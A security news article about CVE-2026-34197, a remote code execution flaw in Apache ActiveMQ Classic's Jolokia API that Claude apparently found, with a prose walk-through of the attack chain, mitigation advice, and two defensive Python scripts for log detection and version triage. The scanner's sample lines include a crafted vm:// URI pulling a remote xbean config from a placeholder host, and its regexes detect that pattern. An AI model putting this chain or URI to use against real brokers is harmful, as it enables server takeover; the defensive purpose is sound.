A critical remote code execution (RCE) vulnerability has been uncovered in Apache ActiveMQ Classic, a defect that remained unnoticed for more than a decade and was eventually identified not by a human analyst manually inspecting code, but by Anthropic’s Claude AI model in less than 10 minutes.
Categorized as CVE-2026-34197, this issue is an improper input validation and code injection vulnerability existing in Apache ActiveMQ Classic’s Jolokia JMX-HTTP bridge, exposed through the web console at /api/jolokia/ on port 8161.
This vulnerability enables an authenticated adversary to invoke the addNetworkConnector(String) management operation on the broker’s MBean and provide a crafted VM transport URI containing an attacker-controlled brokerConfig=xbean:http:// parameter.
Upon processing, ActiveMQ’s VM transport layer generates an on-the-fly embedded broker by invoking BrokerFactory.createBroker() using the URL provided by the attacker.
The xbean: scheme subsequently delivers the URL to Spring’s ResourceXmlApplicationContext, which initializes all bean definitions in the remote XML file — permitting arbitrary OS command execution through Spring’s MethodInvokingFactoryBean to call Runtime.getRuntime().exec().
The root cause relates back to a fix for CVE-2022-41678, where Apache instituted a comprehensive Jolokia allow rule for all operations on ActiveMQ’s own MBeans (org.apache.activemq:*) to maintain the web console’s functionality. This decision inadvertently opened up every management operation — including addNetworkConnector — as an attack surface via Jolokia’s REST API.
While CVE-2026-34197 requires valid credentials in most deployments, default credentials (admin:admin) are frequently present across enterprise environments.

More alarmingly, organizations running ActiveMQ versions 6.0.0 to 6.1.1 are exposed to a fully unauthenticated RCE path. A separate defect, CVE-2024-32114, unintentionally removed authentication requirements from the /api/* path in those versions, so the Jolokia endpoint demands no credentials at all, turning CVE-2026-34197 into a no-auth RCE on those builds.
ActiveMQ has a well-documented history of being targeted in the wild. Both CVE-2016-3088 (authenticated RCE via the web console) and CVE-2023-46604 (unauthenticated RCE via the broker port) are included in CISA’s Known Exploited Vulnerabilities (KEV) catalog.
Researchers at Horizon3.ai credited Anthropic’s Claude AI for pinpointing the defect during an AI-assisted source code review. By equipping Claude with a streamlined vulnerability-hunting prompt and a live target for verification, the team allowed the AI to track the multi-component attack chain encompassing Jolokia, JMX, network connectors, and VM transports in roughly 10 minutes.
Experts noted this sequence likely would have required a proficient human researcher an entire week to map manually, highlighting how AI models are fundamentally reducing the barrier for vulnerability research.
Organizations should monitor ActiveMQ broker logs for entries mentioning vm:// URIs that contain brokerConfig=xbean:http, POST requests to /api/jolokia/ featuring addNetworkConnector in the body, and unexpected outbound HTTP connections from the ActiveMQ process. Defenders should also monitor for unusual child processes spawned by the ActiveMQ JVM.
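The log indicators listed above can be turned into a small scanner. The following is an added example written for this article, not code from Horizon3.ai or the ActiveMQ project; the sample lines are constructed for illustration (the access-log and broker-log formats are assumed, not copied from a real deployment), and it goes slightly beyond the text by percent-decoding each line so that URL-encoded variants of the same indicators, including GET-style Jolokia exec paths, are also caught.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (not from the page or from a real incident).
# Line 1: web-console access log, Jolokia exec request naming addNetworkConnector.
# Line 2: broker log showing a vm:// URI whose brokerConfig points at a remote xbean URL
#         (the log message format is an assumption for illustration).
# Line 3: benign Jolokia read of broker attributes; should not be flagged.
# Line 4: URL-encoded variant of both indicators on a GET-style exec path.
SAMPLE_LINES = [
    '10.0.0.5 - admin [01/Jan/2026:12:00:00 +0000] "POST /api/jolokia/ HTTP/1.1" 200 312 '
    '{"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
    '"operation":"addNetworkConnector(java.lang.String)"}',
    '2026-01-01 12:00:01,000 | INFO  | Establishing network connection from '
    'vm://localhost?brokerConfig=xbean:http://198.51.100.7/cfg.xml | '
    'org.apache.activemq.network.DiscoveryNetworkConnector',
    '10.0.0.6 - admin [01/Jan/2026:12:01:00 +0000] "POST /api/jolokia/ HTTP/1.1" 200 1234 '
    '{"type":"read","mbean":"org.apache.activemq:type=Broker,brokerName=localhost"}',
    '10.0.0.5 - admin [01/Jan/2026:12:02:00 +0000] "GET /api/jolokia/exec/'
    'org.apache.activemq:type=Broker,brokerName=localhost/addNetworkConnector/'
    'vm%3A%2F%2Flocalhost%3FbrokerConfig%3Dxbean%3Ahttp%3A%2F%2F198.51.100.7%2Fcfg.xml '
    'HTTP/1.1" 200 88',
]

# Indicator patterns derived from the article's detection guidance.
JOLOKIA_PATH = re.compile(r'/api/jolokia/', re.IGNORECASE)
ADD_NETWORK_CONNECTOR = re.compile(r'addNetworkConnector', re.IGNORECASE)
VM_URI_REMOTE_XBEAN = re.compile(r'vm://[^\s"\']*brokerConfig=xbean:https?://', re.IGNORECASE)


def scan_line(line):
    """Return the names of the indicators present in one log line."""
    decoded = unquote(line)  # make percent-encoded vm%3A%2F%2F... readable
    hits = []
    if JOLOKIA_PATH.search(decoded) and ADD_NETWORK_CONNECTOR.search(decoded):
        hits.append("jolokia_addNetworkConnector")
    if VM_URI_REMOTE_XBEAN.search(decoded):
        hits.append("vm_uri_remote_xbean_config")
    return hits


def scan(lines):
    """Return [(1-based line number, indicator names)] for every line with a hit."""
    findings = []
    for number, line in enumerate(lines, start=1):
        hits = scan_line(line)
        if hits:
            findings.append((number, hits))
    return findings


if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LINES):
        print(f"line {number}: {', '.join(hits)}")
```

Feed it the Jetty access log and the broker log (activemq.log) line by line; either indicator on its own is worth an alert, and both on the same host within a short window is the full chain the article describes.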
The vulnerability is resolved in ActiveMQ Classic versions 5.19.4 and 6.2.3. The correction eliminates the capability for addNetworkConnector to register vm:// transports through the Jolokia API entirely.
All organizations operating affected versions should upgrade without delay and examine deployments for default credential usage across all ActiveMQ instances.
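For triaging an inventory of brokers against the versions named above, the following is an added example, not code from the article's authors or the ActiveMQ project. It assumes that every 5.x release before 5.19.4 and every 6.x release before 6.2.3 is affected, that 6.0.0 through 6.1.1 additionally lacks authentication on /api/* because of CVE-2024-32114, and the inventory it reads is constructed for illustration.

```python
import re

# Fix versions named in the article, keyed by major version.
FIXED_IN = {5: (5, 19, 4), 6: (6, 2, 3)}
# Releases in which CVE-2024-32114 removed authentication from /api/* (6.0.0 to 6.1.1).
UNAUTHENTICATED_RANGE = ((6, 0, 0), (6, 1, 1))


def parse_version(text):
    """Turn '6.1.1' (optionally with a '-suffix') into a comparable tuple."""
    match = re.fullmatch(r'(\d+)\.(\d+)\.(\d+)(?:-.*)?', text.strip())
    if not match:
        raise ValueError(f"unrecognised ActiveMQ version: {text!r}")
    return tuple(int(part) for part in match.groups())


def classify(version_text):
    """Classify one broker version for CVE-2026-34197 exposure."""
    version = parse_version(version_text)
    fixed = FIXED_IN.get(version[0])
    if fixed is None:
        return "unknown-branch"  # only 5.x and 6.x are discussed in the article
    if version >= fixed:
        return "patched"
    low, high = UNAUTHENTICATED_RANGE
    if low <= version <= high:
        return "vulnerable-unauthenticated"  # CVE-2024-32114 makes this no-auth RCE
    return "vulnerable-authenticated"  # credentials required; check for admin:admin


PRIORITY = {
    "vulnerable-unauthenticated": 0,
    "vulnerable-authenticated": 1,
    "unknown-branch": 2,
    "patched": 3,
}


def triage(inventory):
    """Return (host, version, classification) tuples ordered worst-first."""
    rows = [(host, ver, classify(ver)) for host, ver in inventory.items()]
    return sorted(rows, key=lambda row: (PRIORITY[row[2]], row[0]))


# Constructed inventory for illustration; hostnames and versions are invented.
SAMPLE_INVENTORY = {
    "mq-prod-01": "6.1.1",
    "mq-prod-02": "6.2.3",
    "mq-legacy-01": "5.18.3",
    "mq-stage-01": "6.1.2",
    "mq-lab-01": "5.19.4",
}

if __name__ == "__main__":
    for host, version, status in triage(SAMPLE_INVENTORY):
        print(f"{host:14} {version:8} {status}")
```

Brokers classified as vulnerable-unauthenticated should be patched or isolated first, since no credential hygiene protects them; for the authenticated class, the upgrade and the default-credential audit go together.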